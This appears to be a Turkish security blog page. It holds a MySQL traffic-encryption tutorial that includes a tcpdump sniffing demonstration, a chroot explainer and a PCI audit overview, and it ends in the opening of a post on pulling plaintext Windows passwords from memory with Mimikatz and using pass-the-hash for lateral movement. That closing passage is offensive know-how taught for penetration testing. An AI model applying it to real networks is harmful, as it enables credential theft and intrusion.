href="http://www.blackhat.com/presentations/bh-dc-09/Muckin/BlackHat-DC-09-Muckin-vista-security-internals.pdf" target="_blank"> http://www.blackhat.com/presentations/bh-dc-09/Muckin/BlackHat-DC-09-Muckin-vista-security-internals.pdf</a>

WCE ve Mimikatz Kullanarak Windows Oturum Parolalarının Açık Halde Elde Edilmesi #2

Bir önceki yazıda Windows işletim sisteminde oturum açma sırasında görevli olan prosesler ve bu proseslerin işlevlerinden konumuz dahilinde...

Read more »

MySQL Sunucu ve İstemci Trafiğinin Şifrelenmesi

<br /><div style="text-align: justify;"><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-daHGaHINjZI/Uj4VnRldhPI/AAAAAAAAAbk/dECB32ZthJo/s1600/sakila-security.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="158" src="http://4.bp.blogspot.com/-daHGaHINjZI/Uj4VnRldhPI/AAAAAAAAAbk/dECB32ZthJo/s200/sakila-security.png" width="200" /></a></div>Aksi belirtilmedikçe MySQL sunucusu ile istemcisi arasındaki ağ trafiği açık metin olarak gerçekleştirilmektedir. Aslında bu sadece MySQL’e has bir özellik değil, sunucu istemci mimarisi ile çalışan bütün uygulamalar için gieçerli bir durumdur. İstemci sunucu arasındaki ağ trafiğini gözlemlemek isteyen kişiler, sunucu istemci arasında açık metin olarak gerçekleştirilen ağ trafiğini dinlereyek hassas bilgilere erişim sağlayabilirler.</div><br /><div style="text-align: justify;">Aşağıda MySQL sunucusu ile istemcisi arasındaki ağ trafiğinin gözlemlenmesi halinde nelerin yapılabileceğini göstermek açısından, MySQL sunucu sistemi üzerinde tcpdump ve strings komutları kullanılarak gerçekleştirilen gözlemlenebilen SQL sorgu işlemleri gösterilmiştir.<br /><a name="more"></a></div><br /># tcpdump -l -i eth0 -w - src or dst port 3306 | strings<br />tcpdump: listening on eth0, link-type EN10MB (Ethernet), capture size 96 bytes<br />5.0.45<br />wRuuj5g,<br />LLBPALES<br />show databases<br />SCHEMATA<br />Datab<br />show tables<br />TABLE_NAMES<br />select @@version_comment<br />@@version_com<br />show databases<br />SCHEMATA<br />Datab <br /><br /><div style="text-align: justify;">Görüldüğü gibi MySQL istemcisinden gerçekleştirilen SQL sorguları açık olarak görülmektedir. Aynı durum MySQL sunucusu ve istemcisi arasındaki trafiğin şifreli olarak iletildiğinde aşağıdaki gibi olmaktadır. </div><br /># tcpdump -l -i eth0 -w - src or dst port 3306 | strings<br />tcpdump: listening on eth0, link-type EN10MB (Ethernet), capture size 96 bytes<br />gLO<br />%DgLOY<br />gLOY<br />lnp@<br />%HgLOY4<br />5.0.45<br />bA['P;xl<br />gLO\<br />gLO_<br />4nq@<br />%KgLO_<br />gLOo<br />4nr@<br /><br /><div style="text-align: justify;">Yukarıda görüldüğü gibi MySQL sunucusu ve istemcisi arasındaki ağ trafiği şifreli bir biçimde gerçekleştirildiğinde, sorgular açık olarak görüntülenememektedir.</div><br /><div style="text-align: justify;">MySQL sunucu ve istemci trafiğinin şifrelenmesi için uygulanabilecek yöntemlerden bir taneside OpenSSL uygulamasının kullanılmasıdır. MySQL sunucu, istemci trafiğinin şifrelenmesi için kullanılabilecek açık kaynak kodlu yöntemlerden bazıları olarak OpenSSH , OpenVPN ve OpenSSL gösterilebilir. Burada OpenSSL kullanılarak nasıl sunucu istemci arasındaki trafiğin şifreleneceği anlatılacaktır. Öncelikle mevcut MySQL sunucu servisinde SSL desteğinin aktif olup olmadığına bakılmalıdır. Şekil 1'de görüldüğü gibi “SHOW VARIABLES LIKE 'have_openssl'” sql sorgusu ile görüntülenebilir.</div><div style="text-align: justify;"><br /></div><div><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><img src="http://www.bilgiguvenligi.gov.tr/images/stories/galkan/ekil_1_3_mysql_ssl_desteinin_kontrol_edilmesi.png" style="margin-left: auto; margin-right: auto;" /></td></tr><tr><td class="tr-caption" style="text-align: center;"><span style="font-size: small; text-align: start;">Şekil 1 MySQL Ssl Desteğinin Kontrol Edilmesi</span></td></tr></tbody></table><div style="text-align: justify;">“Value” değerinin “DISABLED” olması, veritabanı sunucusunun SSL desteğinini aktif hale getirilmesi için 5.0 öncesi sürümlerde "--with-vio", "--with-openssl" seçeneklerinin kullanılması gerekmektedir.5.0sürümleri için "--with-openssl" seçeneğinin kullanılması yeterli olacaktır. 5.1 ve sonrası sürümlerde SSL desteğinini aktif hale getirilmesi için "--with-ssl" seçeneğinin kullanılması yeterli olacaktır.</div><br /><div style="text-align: justify;">MySQL sunucu servisine SSL desteğinin verilmesinin ardından sunucu ve istemci için gerekli sertifikalar oluşturulmalı ve son olarak sunucu ve istemci yapılandırma dosyalarında gerekli işlemler gerçekleştirilmelidir. Burada sertifika otoritesi için gerekli sertifikalar bizim tarafımızdan üretilerek, sunucu ve istemci için oluşturulacak sertifikalar bu sertifika yardımı ile üretilecektir. Bunun için öncelikle sertifikalar için uygun bir dizin belirlenmeli ve gerekli sertifikalar oluşturulmalıdır.</div></div><div># mkdir /usr/local/mysql-certs<br /># cd /usr/local/mysql-certs<br /><br /><div style="text-align: justify;">Sertifika için gerekli dizinin oluşturulmasının ardından öncelikle sertifika otoritesi için gerekli seritifikalar oluşturulmalı ardından, sunucu ve istemci için gerekli sertifikalar oluşturulmalıdır. Sertifika otoritesi için gerekli sertifikayı oluşturmak için aşağıdaki adımlar sırası ile uygulanmalıdır.</div></div><div># openssl genrsa -out ca-key.pem 2048<br />Generating RSA private key, 2048 bit long modulus ...........................................................................++++++ e is 65537 (0x10001)<br /># openssl req -new -x509 -nodes -days 1000 -key ca-key.pem -out ca-cert.pem<br />You are about to be asked to enter information that will be incorporated<br />into your certificate request. What you are about to enter is what is called a Distinguished Name or a DN.<br />There are quite a few fields but you can leave some blank For some fields there will be a default value, If you enter '.', the field will be left blank.<br />-----<br />Country Name (2 letter code) [GB]:TR<br />State or Province Name (full name) [Berkshire]:Kastamonu<br />Locality Name (eg, city) [Newbury]:Merkez<br />Organization Name (eg, company) [My Company Ltd]:Agguvenligi<br />Organizational Unit Name (eg, section) []:Agguvenligi<br />Common Name (eg, your name or your server's hostname) []Agguvenligi<br />Email Address []: info@agguvenligi.net<br /><br />Ardından sunucu için gerekli sertifikalar oluşturulmalıdır. Bunun için aşağıdaki adımların sırası ile takip edilmesi gerekmektedir.<br /># openssl req -newkey rsa:2048 -days 1000 -nodes -keyout server-key.pem -out server-req.pem<br />Generating a 2048 bit RSA private key<br />...............................................................................................................................+++<br />...................................................................+++ writing new private key to 'server-key.pem'<br />-----<br />You are about to be asked to enter information that will be incorporated<br />into your certificate request.<br />What you are about to enter is what is called a Distinguished Name or a DN.<br />There are quite a few fields but you can leave some blank For some fields there will be a default value, If you enter '.', the field will be left blank.<br />-----<br />Country Name (2 letter code) [GB]:TR<br />State or Province Name (full name) [Berkshire]:Kastamonu<br />Locality Name (eg, city) [Newbury]:Merkez<br />Organization Name (eg, company) [My Company Ltd]:Agguvenligi<br />Organizational Unit Name (eg, section) []:Agguvenligi<br />Common Name (eg, your name or your server's hostname) []:Agguvenligi<br />Email Address []: info@agguvenligi.net<br /><br />Please enter the following 'extra' attributes to be sent with your certificate request<br />A challenge password []:<br />An optional company name []:<br /># openssl x509 -req -in server-req.pem -days 1000 -CA ca-cert.pem -CAkey ca-key.pem -set_serial 01 -out server-cert.pem<br />Signature ok<br />subject=/C=TR/ST=Kastamonu/L=Merkez/O=Agguvenligi/OU=Agguvenligi/CN=Agguvenligi Guvenligi/emailAddress= info@agguvenligi.net<br />Getting CA Private Key<br /><br />Son olaral MySQL istemcisi için gerekli sertifikalar oluşturulmalıdır. Bunun için aşağıdaki adımların sırası ile takip edilmesi gerekmektedir.<br /># openssl req -newkey rsa:2048 -days 1000 -nodes -keyout client-key.pem -out client-req.pem<br />Generating a 2048 bit RSA private key ..........+++.....................................................................+++ writing new private key to 'client-key.pem'<br />-----<br />You are about to be asked to enter information that will be incorporated<br />into your certificate request.<br />What you are about to enter is what is called a Distinguished Name or a DN.<br />There are quite a few fields but you can leave some blank For some fields there will be a default value, If you enter '.', the field will be left blank.<br />-----<br />Country Name (2 letter code) [GB]:TR<br />State or Province Name (full name) [Berkshire]:Kastamonu<br />Locality Name (eg, city) [Newbury]:Merkez<br />Organization Name (eg, company) [My Company Ltd]:Agguvenligi<br />Organizational Unit Name (eg, section) []:Agguvenligi<br />Common Name (eg, your name or your server's hostname) []:Agguvenligi<br />Email Address []: info@agguvenligi.net<br /><br />Please enter the following 'extra' attributes<br />to be sent with your certificate request<br />A challenge password []:<br />An optional company name []:<br /># openssl x509 -req -in client-req.pem -days 1000 -CA ca-cert.pem -CAkey ca-key.pem -set_serial 01 -out client-cert.pem<br />Signature ok<br />subject=/C=TR/ST=Kastamonu/L=Merkez/O=Agguvenligi/OU=Agguvenligi/CN=Agguvenligi/emailAddress= info@agguvenligi.net<br />Getting CA Private Key<br /><br /><div style="text-align: justify;">Sertifikaların oluşturulmasının ardından kullanım için MySQL sunucu tarafında sertifikaların MySQL yapılandırma dosyası içerisinde gerekli belirtimlerinin gerçekleştirilmesi gerekmektedir. Bunun için yapılandırma dosyasında sunucu taraflı yapılandırma için[mysqld] bölümü içerisine aşağıda belirtilen satırların eklenmesi gerekmektedir.</div><div style="text-align: justify;"><br /></div>[mysqld]<br />ssl-ca=/usr/local/MySQL-certs/cacert.pem<br />ssl-cert=/usr/local/MySQL-certs/server-cert.pem<br />ssl-key=/usr/local/MySQL-certs/server-key.pem<br /><br /><div style="text-align: justify;">MySQL sunucu üzerinde sunucu taraflı gerekli yapılandırmanın gerçekleştirilmesinin ardından MySQL sunucu servisi yeninden başlatılmalıdır ardından MySQL sunucu servisi üzerinde SSL kullanımının aktif olduğu görülebilecektir.</div></div><div style="text-align: justify;"><br /></div><div><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><img src="http://www.bilgiguvenligi.gov.tr/images/stories/galkan/ekil_4_mysql_sunucu_servisi_in_ssl_kullanmnn_aktif_hale_getirilmesi.png" style="margin-left: auto; margin-right: auto;" /></td></tr><tr><td class="tr-caption" style="text-align: center;"><span style="font-size: small; text-align: start;">Şekil 2 MySQL Sunucu Servisi İçin SSL Kullanımının Aktif Hale Getirilmesi</span></td></tr></tbody></table><div style="text-align: justify;">Ardından MySQL istemcisi sertifika kullanımı için gerekli yapılandırmanın gerçekleştirilmesi gerekmektedir. Burada uzak MySQL istemcisi ile komut satırından MySQL sunucusu ile iletişim sağlanıp sorguların gerçekleştirileceği göz önünde bulundurularak, aşağıdaki adımların sırası ile takip edilmelidir. Kullanılmak istenen MySQL istemcisine gore sertifika kullanımı ile ilgili yapılandırma farklılık göstereceği unutulmamalıdır. Öncelikle sertifika yetkilisi ve istemcisi için gerekli sertifikalar MySQL istemcisi üzerinde belirlenen uygun bir dizine taşınmalıdır. Burada “/usr/local/mysql-certs” dizini olarak belirlenmiştir. İsteğe gore farklı bir dizin seçilebilmektedir.</div></div><div style="text-align: justify;"><br /></div><div><div style="text-align: justify;"><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><img src="http://www.bilgiguvenligi.gov.tr/images/stories/galkan/ekil_5_mysql_stemcisinde_ssl_kullanm_aktif_olmadan_nce.png" style="margin-left: auto; margin-right: auto;" /></td></tr><tr><td class="tr-caption" style="text-align: center;"><span style="font-size: small; text-align: start;">Şekil 3 MySQL İstemcisinde SSL Kullanımı Aktif Olmadan Önce</span></td></tr></tbody></table></div><div style="text-align: justify;">MySQL istemcisi için SSL sertifika kullanımının durumunu “SHOW STATUS LIKE ‘Ssl_cipher’” SQL sorgusu çalıştırılarak elde edilebilir. Bu duruma örnek bir kullanım Şekil 3’de gösterilmiştir.</div><br /><div style="text-align: justify;">MySQL komut satırı istemcisinde SSL kullanımını aktif hale getirmek için yapılandırma dosyasında sertifikaların tam yolları belirtilmelidir.</div><div style="text-align: justify;"><br /></div>[client]<br />ssl-ca=/usr/local/mysql-certs/cacert.pem<br />ssl-cert=/usr/local/mysql-certs/client-cert.pem<br />ssl-key=/usr/local/mysql-certs/client-key.pem<br /><br /><div style="text-align: justify;">İlgili ayaların ardından MySQL istemcisinde “SHOW STATUS LIKE ‘Ssl_cipher’” sorgusu tekrar çalıştırılarak şifreleme için kullanılacak olan anahtar görüntülenebilir.</div></div><div style="text-align: justify;"><br /></div><div><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><img src="http://www.bilgiguvenligi.gov.tr/images/stories/galkan/ekil_6_ifreleme_in_kullanlacak_olan_anahtarn_durumunun_grntlenmesi.png" style="margin-left: auto; margin-right: auto;" /></td></tr><tr><td class="tr-caption" style="text-align: center;"><span style="font-size: small; text-align: start;">Şekil 4 Şifreleme İçin Kullanılacak Olan Anahtarın Durumunun Görüntülenmesi</span></td></tr></tbody></table><div style="text-align: justify;">SSL kullanımının aktif olmasının ardından MySQL kullanıcılarının SSL kullanımı ile MySQL sunucu servisi ile iletişime geçmelerini zorlamak için GRANT ifadesinde “REQUIRE SSL” kullanılarak gerçekleştirilebilir. Örnek bir ifade aşağıda yer almaktadır.</div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">mysql> GRANT ALL ON deneme.* TO mysqluser@192.168.6.105 IDENTIFIED BY 'sifre' REQUIRE SSL;</div><br /><div style="text-align: justify;">Bu şekilde mysqluser kullanıcısının deneme veritabanına 192.168.6.105 ip adresinden SSL kullanımı aktif olacak şekilde bağlanması zorlanmış olur. Eğer SSL kullanımı aktif olmadan bağlanmaya çalışılırsa Şekil 5’de görülen hata mesajı ile karşılaşılacaktır.</div></div><div style="text-align: justify;"><br /></div><div><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><img src="http://www.bilgiguvenligi.gov.tr/images/stories/galkan/ekil_7_ssl_kullanm_zorlanm_mysql_kullancsnn_ssl_kullanm_olmakszn_balant_gerekletirilmesi_esnasnda_karlalan_hata_mesaj.png" style="margin-left: auto; margin-right: auto;" /></td></tr><tr><td class="tr-caption" style="text-align: center;"><span style="font-size: small; text-align: start;">Şekil 5 SSL Kullanımı Zorlanmış MySQL Kullanıcısının SSL Kullanımı Olmaksızın Bağlantı </span><span style="font-size: small; text-align: start;">Gerçekleştirilmesi Esnasında Karşılaşılan Hata Mesajı</span></td></tr></tbody></table></div><div><br /></div><div>KAYNAKLAR<br /><br />[1]<a href="http://dev.mysql.com/doc/"> http://dev.mysql.com/doc/</a><br />[2] <a href="http://www.securityfocus.com/infocus/1726">http://www.securityfocus.com/infocus/1726</a><br />[3] <a href="http://forge.mysql.com/wiki/Security_Vulnerabilities_In_MySQL_Server">http://forge.mysql.com/wiki/Security_Vulnerabilities_In_MySQL_Server</a></div>

MySQL Sunucu ve İstemci Trafiğinin Şifrelenmesi

Aksi belirtilmedikçe MySQL sunucusu ile istemcisi arasındaki ağ trafiği açık metin olarak gerçekleştirilmektedir. Aslında bu sadece MySQL’e...

Read more »

Chroot Nedir ?

<div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-1thu4Q9a1cY/Uj4S_T1N45I/AAAAAAAAAbY/lFgjYFU4yVY/s1600/ftp_jail.gif" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="117" src="http://4.bp.blogspot.com/-1thu4Q9a1cY/Uj4S_T1N45I/AAAAAAAAAbY/lFgjYFU4yVY/s200/ftp_jail.gif" width="200" /></a></div><b>1. Motivasyon</b><br /><br /><div style="text-align: justify;">Bu makalede özellikle sunucu servis yazılımlarının ve uygulamaların Chroot ortamında çalıştırılması, kademeli güvenlik anlayışı gibi yaklaşımlardan ziyade basit olarak Chroot nedir ve neden Chroot kullanmak gerekli sorusuna cevap aranmaya çalışılacaktır.</div><br /><div><b>2. Chroot Nedir?</b><br /><br /><div style="text-align: justify;">Chroot, yazılımlar için yeni bir kök (/) dizini tanımlar. Kısaca çalıştırılacak olan servis ya da uygulama için gerekli kütüphane, yapılandırma, sürücü dosyaları (device file), bu servis için belirlenen kök dizinde bulunan ilgili yollara (path) kopyalanır ve hapsedilmiş olarak çalıştırılır.<br /><a name="more"></a></div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">Peki, Chroot kullanmanın getirdiği avantajlar ve dezavantajlar nelerdir ve neden kullanmak gerekli? Kısaca bu sorunun cevabı, eğer sistem üzerinde Chroot ortamında çalışan bir servis ya da uygulamadan kaynaklanan bir açıklığı kullanarak sisteme sızan bir saldırgan, bütün dosya sistemine ve işletim sistemi kaynaklarına erişim sağlayamayacak ve sadece Chroot için belirlenen kök dizine ve burada bulunan kaynaklara erişim sağlayabilecektir. Ayrıca kısıtlı dosya sistemi erişimi sağlaması yanında kısıtlı komutlara erişim ile de sistem üzerinde bulunan komutlar kümesine erişim de kısıtlanmış olacaktır. </div><br />Aşağıdaki şekilde ( Şekil 1 ) Chroot kullanımı ile dosya sistemine erişim şematize edilmiştir.<br /><br /><br /><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><img src="http://www.bilgiguvenligi.gov.tr/images/stories/galkan/chroot.png" style="margin-left: auto; margin-right: auto;" /></td></tr><tr><td class="tr-caption" style="text-align: center;"><span style="font-size: small; text-align: start;">Şekil 1 Chroot Kullanımı İle Yeni Dosya Sistemi Hiyerarşisi</span></td></tr></tbody></table></div><br /><b>3. Chroot Nasıl Çalışır?</b><br /><br />Chroot komutu;<br /><h4>#chroot /chroot [komut seti]</h4>şeklinde çalıştırılır.<br /><br /><div><div style="text-align: justify;">Burada /chroot dizini örnek dizin olarak belirtilmemiştir. Bu dizin yerine isteğe göre herhangi bir dizin seçilebilir.</div><br />Örnek bir kullanımı şu şekildedir.<br /><br /># mkdir /yeni_dizin<br /># chroot /yeni_dizin<br /><br /><div style="text-align: justify;">Bütün bu işlemler için chroot komutu, Chroot sistem çağrısını kullanır. Kısaca önce belirlenen yeni kök dizini içerisine girilir ve arkasından Chroot sistem çağrısı çalıştırılır ve son olarak belirlenen kullanıcı kimliğine bürünülerek root kullanıcı haklarından vazgeçilir.</div></div><div><br /># chdir("/yeni_dizin");<br /># chroot("/yeni_dizin");<br /># setuid(500);<br /><br />Bu komutun 500 uid’sine sahip kullanıcı tarafından çalıştırıldığı varsayılmıştır.</div><div><b><br /></b> <b>4. Örnek Chroot Ortamının Oluşturulması</b><br /><div style="text-align: justify;"><br /></div><div style="text-align: justify;">Daha öncede belirtildiği gibi sadece saldırganın bütün dosya sistemine ve işletim sistemi kaynaklarına erişimi engellenmiş olacaktır. Aşağıda Chroot kullanıma basit bir örnek verilmiştir. Bash kabuğu Chroot ortamı altında çalıştırılacak ve birkaç örnek komut Chroot ortamı altında çalıştırılacaktır.</div><br /># mkdir /yeni_dizin<br /># which bash<br />/bin/bash<br /><br /># cd /yeni_dizin<br /># mkdir /bin<br /># mkdir /lib<br /># ldd /bin/bash<br />linux-gate.so.1 => (0x00712000)<br />libtermcap.so.2 => /lib/libtermcap.so.2 (0x00c49000)<br />libdl.so.2 => /lib/libdl.so.2 (0x00c43000)<br />libc.so.6 => /lib/libc.so.6 (0x00afe000)<br />/lib/ld-linux.so.2 (0x00ae0000)<br />#</div><div><br /><div style="text-align: justify;">Bu çıktıya göre bash için gerekli kütüphane dosyaları teker teker belirlenmeli ve ilgili dizinlere kopyalanmalıdır. Hangi kütüphane dosyalarına ihtiyaç olduğu ‘ldd’ komutu aracılığı ile öğrenilebilir.</div><br /># cp –p /lib/libtermcap.so.2 /home/ga/yeni_dizin/lib<br /># cp –p /lib/libdl.so.2 /home/ga/yeni_dizin/lib<br /># cp –p /lib/libc.so.6 /home/ga/yeni_dizin/lib<br /># cp –p /lib/ld-linux.so.2 /home/ga/yeni_dizin/lib<br /><br /><div style="text-align: justify;">Ardından chroot komutu ile bash kabuğu Chroot olarak belirtilen dizinde çalışmaya başlayacaktır. Chroot ortamı altında çalıştırılmak istenen komutlar ve bu komutlar için gerekli kütüphane dosyaları ‘ldd’ komutu yardımı ile bulunarak ilgili dizinlere kopyalanmalıdır.</div><br /># cp –p /bin/bash /yeni_dizin/bin<br /># cp –p /bin/pwd /yeni_dizin/bin<br /># chroot /yeni_dizin/ /bin/bash<br />bash-3.2# pwd<br />/<br />bash-3.2# exit<br /><div style="text-align: justify;"><br /></div></div><div><div style="text-align: justify;">Görüldüğü gibi ‘pwd’ komutu çalıştırıldığında ‘/yeni_dizin’ dizinini kök (/) dizini olarak görülmektedir. Chroot ortamından çıkmak için ‘exit’ komutu kullanılabilir. ‘pwd’ gibi çalıştırılmak istenen komutlar gerekli kütüphane dosyaları ile birlikte ilgili dizinlere kopyalanarak çalıştırılabilirler.</div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">Burada verilen basit bir örnektir. Asıl Chroot kullanım amacı dosya sistemi hiyerarşisi üzerinde dağıtık biçimde erişim sağlayabilen servisler için kullanımı olmalıdır. Bu şekilde saldırgan, sistem üzerinde çalışan bir servisten ya da uygulamadan kaynaklanan bir açıklık ile sisteme sızmayı başardığında bütün dosya sistemine erişimi engellenmiş olacaktır.</div></div><div><b><br /></b> <b>5. Kaynaklar</b><br /><br />[1] <a href="http://www.sun.com/bigadmin/content/developer/howtos/images/chrooted_fig1.gif">http://www.sun.com/bigadmin/content/developer/howtos/images/chrooted_fig1.gif</a><br />[2] man chroot<br /><br /></div>

Chroot Nedir ?

1. Motivasyon Bu makalede özellikle sunucu servis yazılımlarının ve uygulamaların Chroot ortamında çalıştırılması, kademeli güvenlik anlayı...

Read more »

PCI Denetimine Hazırlık #1

<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEikoxWqdibDzLnoWdr1B9y3AjuypVDe8J54ad-KQTLXz2IMxhdAlMksWJwvE8ZAz3HIgQYqR-S07re3YcBoZ7hQ1fXLGIls1nzM4bw4H6vOKR_VgibeUqfbuCuxffZbMN1mQMuSmKUjh2M/s1600/money.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEikoxWqdibDzLnoWdr1B9y3AjuypVDe8J54ad-KQTLXz2IMxhdAlMksWJwvE8ZAz3HIgQYqR-S07re3YcBoZ7hQ1fXLGIls1nzM4bw4H6vOKR_VgibeUqfbuCuxffZbMN1mQMuSmKUjh2M/s320/money.jpg" width="320" /></a></div><h3></h3><div style="text-align: justify;">PCI (Payment Card Industry) kart ve kart sahibi bilgilerinin korunması için belirlenmiş operasyonel ve teknik gereksinimleri kapsayan bir standarttır. Bu standarda uyumluluk PCI konseyi (SSC) adı verilen , American Express, Discover Financial Services, JCB International, MasterCard Worldwide, ve Visa Inc. Firmaları tarafından belirlenmiştir. </div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">Bu firmaların kredi kartlarını kullanan bankalar ise, birlikte çalıştıkları firmalardan PCI uyumluluğunu beklemektedirler. Bu yazı dizisinde, "card not present" olarak tabi edilen Kredi Kartının fiziksel olarak kullanılmadığı durumlarla ilgili bilgi verilecektir.</div><h3>PCI Seviye Belirleme </h3><div style="text-align: justify;">Kredi Kartı ile işlem yapan firmalar, yıllık toplam işlem adedine göre denetimlere tabi olur. Hangi seviyeye denk geldiği ve bu seviyeye göre alınması gereken aksiyonları aşağıdaki tabloda belirtilmiştir. Yıllık toplam işlem adetleri çalışılan bankadan öğrenilebilir.</div><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEioISdf9lAOkSipUXS5ltyiCn8G68oM0lECfzVLN-TKsds7_rt55e2pL3S_TUjHhwB8N_lj9ktMT-zN2qzigdZq0u0rBbClD2UkX46TiquhDoYl2tjQbi7TiiFKZA9dOpeaGELAtBfR2uo/s1600/pci1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="256" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEioISdf9lAOkSipUXS5ltyiCn8G68oM0lECfzVLN-TKsds7_rt55e2pL3S_TUjHhwB8N_lj9ktMT-zN2qzigdZq0u0rBbClD2UkX46TiquhDoYl2tjQbi7TiiFKZA9dOpeaGELAtBfR2uo/s640/pci1.PNG" width="640" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"></div><br /><div style="text-align: justify;">(*) ISA Nasıl olunur?: Alınacak eğitim ve sonrasında sınavın ardından ISA olunur. Bunun ardından her sene eğitim alınması gereklidir. ISA sadece o sırada çalışılan firmada geçerlidir, iş değiştirme durumlarında geçerliğini kaybeder.</div><h3>PCI Kritik Bilgiler Neler, Bunlara Karşı Nasıl Davranılır? </h3>İş gereği kredi kartı bilgileri ile çalışması gerektiği durumlarda, Kredi Kartı bileşenlerini kullanma kuralları vardır. PCI'a göre bu bileşenlerden "Hassas" olarak belirlenenlerin saklanması mümkün değildir:<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiEo6Xd0WAsWt7dQiVPW2H3ujp1L6i4qtA2_5Ksg69BeQGdpSSI4epNgLxnVPRjjzHLyjevVu69pS9sIGoGVNm6pVlly8iz7R8MXmZbr1Y3SdkZJCLfhtSxFgEgS4lSBqq7c-vCIxfUWRo/s1600/pci2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="221" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiEo6Xd0WAsWt7dQiVPW2H3ujp1L6i4qtA2_5Ksg69BeQGdpSSI4epNgLxnVPRjjzHLyjevVu69pS9sIGoGVNm6pVlly8iz7R8MXmZbr1Y3SdkZJCLfhtSxFgEgS4lSBqq7c-vCIxfUWRo/s640/pci2.PNG" width="640" /></a></div><br /><h3>PCI Domainleri </h3>PCI'da uyulması gereken kurallar 6 Ana domain'e ayrılır:<br /><ol><li>Güvenli ağ altyapısının kurulumu ve işletimi</li><ul><li>Firewall ile güvenlik sağlanması</li><li>Default sistem şifrelerinin kullanılmaması</li></ul><li>Kart ve Kart Sahibi Datasının korunması</li><ul><li>Saklanılan kart datasının korunması</li><li>Public networklerde kart datasının şifrelenmesi</li></ul><li>Açıklık Yönetimi Programının oluşturulması</li><ul><li>Antivirus programı kullanılması ve güncel tutulması</li><li>Sistem ve uygulamaların güvenli geliştirilmesi ve işletilmesi</li></ul><li>Kontrollü erişim sağlanması</li><ul><li>Kart Datasına erişimin kısıtlanması</li><li>Kullanıcı tekilliğinin sağlanması</li><li>Kart datasına fiziksel erişimin kısıtlanması</li></ul><li>Sistemleri izlenmesi ve test edilmesi</li><ul><li>Kart datasına erişimlerin izlenmesi ve monitör edilmesi</li><li>Sistem ve süreçlerin düzenli gözden geçirilmesi ve test edilmesi</li></ul><li>Bilgi Güvenliği Politikası İşletilmesi</li><ul><li>Tüm Personel için uygulanacak Bilgi Güvenliği politikası işletilmesi</li></ul></ol><br />Bu domainlerle ilgili detay bilgileri sonraki hazırlık yazılarında bulabilirsiniz.

PCI Denetimine Hazırlık #1

PCI (Payment Card Industry) kart ve kart sahibi bilgilerinin korunması için belirlenmiş operasyonel ve teknik gereksinimleri kapsayan bir st...

Read more »

WCE ve Mimikatz Kullanarak Windows Oturum Parolalarının Açık Halde Elde Edilmesi #1

<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiM1ROS1uIob052Dn1Fb7At1dtjJhXZAbHVHcK7hplFaskGK4zHYX84NFkqIX5FJzFQoHzypJ19mBo9S4Mzld5Lxz_Q4K0RGG-U74g68UoukvSll2u-kCFfkKzBNCc3NcnSCE4vJAwzuxOy/s1600/103.jpg" imageanchor="1" style="clear: left; display: inline !important; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="184" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiM1ROS1uIob052Dn1Fb7At1dtjJhXZAbHVHcK7hplFaskGK4zHYX84NFkqIX5FJzFQoHzypJ19mBo9S4Mzld5Lxz_Q4K0RGG-U74g68UoukvSll2u-kCFfkKzBNCc3NcnSCE4vJAwzuxOy/s320/103.jpg" width="320" /></a><br /><div style="text-align: justify;">Etki alanı sızma testlerinde ele geçirilen bir bilgisayardan diğer bilgisayarlara yayılma işlemlerinde PTH (Pass-The-Hash) adı verilen yöntem kullanılır. Bu yöntemde bir bilgisayarın diskinden (SAM dosyasından) alınan yerel yönetici parolasının özeti kullanılarak (psexec aracıyla veya başka tekniklerle) diğer bilgisayarlarda oturum açılmaya çalışılır. Ancak bazı durumlarda parolanın özeti yeterli olmayabilmektedir. Örneğin, etki alanı parolası ile entegre bir başka sisteme (Outlook web maile, VPN sistemlerine, vs.) bağlanılmaya çalışıldığında parola özeti yetersiz kalabilmektedir. Bu durumlarda parolanın kendisi (açık hali - plaintext) gerekmektedir.</div><div style="text-align: justify;"></div><br /><div style="text-align: justify;">Windows işletim sisteminde açılan bir oturumda oturum süresi boyunca kullanıcıların bazı bilgileri bellek (RAM) üzerinde saklanmaktadır. Bu bilgilerden birisi de parolanın açık halidir. Parolanın bellekten açık olarak elde edilmesi, ikişer başlık halinde iki yazı olarak işlenecektir.</div><ul><li style="text-align: justify;">Birinci 